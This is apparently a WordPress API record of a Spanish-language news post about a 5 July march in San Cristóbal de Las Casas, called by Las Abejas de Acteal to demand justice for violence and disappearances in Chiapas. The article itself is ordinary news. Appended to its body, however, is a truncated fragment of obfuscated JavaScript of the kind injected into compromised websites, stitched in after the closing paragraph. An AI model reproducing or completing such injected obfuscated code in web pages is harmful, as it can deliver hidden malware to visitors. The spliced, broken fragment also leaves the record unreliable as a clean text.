{"id":10692,"date":"2023-06-23T05:13:15","date_gmt":"2023-06-23T05:13:15","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10692"},"modified":"2023-06-23T05:13:15","modified_gmt":"2023-06-23T05:13:15","slug":"anuncian-marchas-para-el-5-de-julio-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10692","title":{"rendered":"Anuncian marchas para el 5 de julio en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-01-25-at-9.08.32-AM-1024x768.jpeg\" alt=\"\" class=\"wp-image-10693\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-01-25-at-9.08.32-AM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-01-25-at-9.08.32-AM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-01-25-at-9.08.32-AM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-01-25-at-9.08.32-AM-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-01-25-at-9.08.32-AM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Integrantes de la Organizaci\u00f3n Sociedad Civil Las Abejas de Acteal, Tierra Sagrada de los M\u00e1rtires de Acteal, invitaron a la marcha peregrinaci\u00f3n por  la verdad, la justicia y la paz que van a realizar hermanos pueblo creyente de la Di\u00f3cesis de San Crist\u00f3bal de Las Casas, el pr\u00f3ximo 5 de julio del presente a\u00f1o.\u201cEl objetivo de este encuentro es para exigir los altos bloqueos carreteros, protestas, manifestaciones, agresiones amenazas, desapariciones de personas, desplazamiento forzado, enfrentamientos, homicidios y retenciones que han sufrido miles de ind\u00edgenas y no ind\u00edgenas as\u00ed como a defensores de los derechos humanos tambi\u00e9n a los hermanos que predican la palabra de Dios como catequistas, ministros, di\u00e1conos, sacerdotes y obispos, entre otros graves actos que llevan riesgo a la integridad personal y vulneran la vida\u201d, suscriben.Es de mencionar que a este encuentro asistir\u00e1n feligreses de las parroquias de San Juan Cancuc, Tenejapa, Ocosingo, Yajal\u00f3n, Petalcingo, Tila, Sabanilla, Frontera Comalapa, Comit\u00e1n, Chicomuselo, entre otros municipios.En su reciente comunicado, dirigido al Congreso Nacional Ind\u00edgena, al Concejo Ind\u00edgena de Gobierno, a la Comisi\u00f3n Interamericana de Derechos Humanos, invitan adem\u00e1s, al segundo aniversario \u201cdel asesinato de nuestro hermano Sim\u00f3n Pedro que se realizara el pr\u00f3ximo 4 y  5 de julio en el ejido nueva israelita en el municipio de Simojovel para consolar a su familia que hoy se encuentra triste por el fallecimiento de su hijo\u201d.\u201cExigimos a la CIDH que emita ya el informe de fondo sobre el caso Acteal 12.790 Manuel Santis Culebra. Que el asesino de nuestro hermano Sim\u00f3n Pedro P\u00e9rez L\u00f3pez siga sentenciado como la ley lo demande\u201d, demandan.\u201cPedimos que  unamos nuestra fuerza para exigir la justicia sobre el caso Acteal, pero no solo,  sino tambi\u00e9n por los muchos casos que hay pendientes. Nuestro trabajo como pueblo que buscamos la verdadera justicia, unimos nuestra solidaridaridad para que nos presenten con vida a  nuestro compa\u00f1ero Antonio Gonzales M\u00e9ndez desaparecido por grupos paramilitares en Chiapas. Todos sabemos que la opacidad  e inacci\u00f3n del Estado Mexicano es una amenaza a la paz para todos los pueblos que luchan por defender su derecho a la vida, a la tierra, el agua que todos anhelamos\u201d, concluyen.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Integrantes de la Organizaci\u00f3n Sociedad Civil Las Abejas de Acteal, Tierra Sagrada de los M\u00e1rtires de Acteal, invitaron a la marcha peregrinaci\u00f3n por la verdad, la justicia y la paz que van a realizar hermanos pueblo creyente de la Di\u00f3cesis de San Crist\u00f3bal de Las Casas, el pr\u00f3ximo 5 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10693,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10692","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10692","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10692"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10692\/revisions"}],"predecessor-version":[{"id":10694,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10692\/revisions\/10694"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10693"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10692"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10692"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10692"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}